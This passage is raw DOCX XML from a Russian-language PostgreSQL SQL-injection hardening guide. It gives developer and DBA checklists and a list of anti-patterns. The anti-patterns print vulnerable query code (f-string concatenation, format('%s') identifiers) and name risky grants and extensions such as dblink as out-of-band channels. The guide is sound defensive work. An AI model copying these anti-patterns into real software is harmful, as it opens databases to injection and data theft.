        <w:t xml:space="preserve">. См. 5.2.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ORDER BY column_name — whitelist explicit, не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для user input. См. 5.2 + 3.14.2.</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LIKE-паттерны —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_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> escape-нуты, либо через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">plainto_tsquery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websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. См. 5.7 + 3.15.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Bulk-параметры (IN-листы) — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ANY($1::type[])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не построение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IN ($1, $2, $3, ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. См. 5.7.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Regex-валидация для UUID / email / slug — на application-layer до SQL. См. 5.7.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Если используется dynamic SQL — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg.sql.SQL</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pgx.Identifier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pg-format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. См. 5.7.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в plpgsql — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для values, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%I')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для identifiers (не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См. 5.2 + 3.16.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SECURITY DEFINER функции — audit на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path</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для читаемых tables. См. 5.3 + 3.17.5.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Драйвер использует extended protocol (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode != simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, нет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">simple_protocol=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). См. 3.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Checklist для DBA (config / runtime audit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Привилегии (5.3):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Application-роль НЕ имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPERUSER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BYPASSRLS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pg_write_all_data</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REVOKE CREATE ON SCHEMA public FROM PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> проверено (для upgrade-нутых с ≤14 кластеров).</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REVOKE CREATE ON DATABASE FROM PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для production-баз.</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FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на critical multi-tenant tables.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Audit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_auth_members</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — application-роль не granted в DBA-роли.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Schema-per-role pattern (или RLS) для multi-tenant изоляции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Расширения (5.4):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В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_extension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dblink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file_fdw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plperlu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plpython3u</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adminpack</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xml2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если есть — обоснование.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REVOKE EXECUTE ON ALL FUNCTIONS IN SCHEMA public FROM PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для нечётко-grantеd функций.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REVOKE USAGE ON FOREIGN DATA WRAPPER ... FROM PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (если есть fdw).</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ALTER DEFAULT PRIVILEGES ... REVOKE ALL ON FUNCTIONS FROM PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для новых функций.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PG 17+: audit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_event_trigger WHERE evtevent = 'login'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нет неизвестных ON LOGIN triggers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конфиги (5.5):</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statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ≤ 30s глобально (или per-role).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idle_in_transaction_session_timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ≤ 60s.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log_statement = 'mod'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (минимум) или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 для full audit.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log_min_error_statement = 'error'</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log_connections = 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log_disconnections = on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ssl = on</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ssl_min_protocol_version = 'TLSv1.2'</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password_encryption = 'scram-sha-256'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> нет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">password</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trust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для non-loopback.</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row_security = on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default; проверить, что не override-нут per-role).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Read-only API роли: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">default_transaction_read_only = on</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shared_preload_libraries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит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pgaudit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Логирование (5.6):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pg_stat_statements.max ≥ 5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для устойчивого pattern-analysis.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pgaudit.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> настроен на critical-tables (per-table) либо глобально </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'read, write, ddl, role'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auto_explain.log_min_duration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — если требуется plan-cache diagnostic (R8/R9-style).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Log shipping в централизованную систему (Elasticsearch / Splunk / Datadog).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Alert rules для специфичных signatures (см. таблицу 5.6).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch level (4.6):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SELECT version()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — на актуальном minor (или с обоснованным lag в managed-deployments).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CVE-2024-4317 —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запущен во всех БД (включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">template0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">template1</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PG 13 EOL (13.11.2025) — кластеры мигрированы на 14+ если ещё на 13.</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 ] PG 12 / 11 / 10 — EOL давно, не использовать в production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Анти-паттерны</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Топ-7 анти-паттернов, которые ставят весь стек defenses под удар:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. **</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">f"SELECT * FROM users WHERE name = '{name}'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">** — конкатенация значений. Все категории 3.X эксплуатируют это (см. 5.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. **</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('SELECT * FROM %s', table_name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">** — identifier injection через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См. 3.16.1.</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`GRANT pg_read_all_data TO app_role`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — одной командой application получает SELECT на всё. См. 5.3.</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`CREATE EXTENSION dblink` от application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — мгновенно открывает 3.6.1 OOB-канал. См. 5.4.</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`Statement.execute()` вместо `PreparedStatement` (Java)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — всегда simple protocol, защита через client-side escape. См. 3.5.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`client.query(sql)` без `values` (node-postgres)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — simple protocol, stacked queries проходят. См. 3.5.6.</w:t>
      </w:r>
    </w:p>
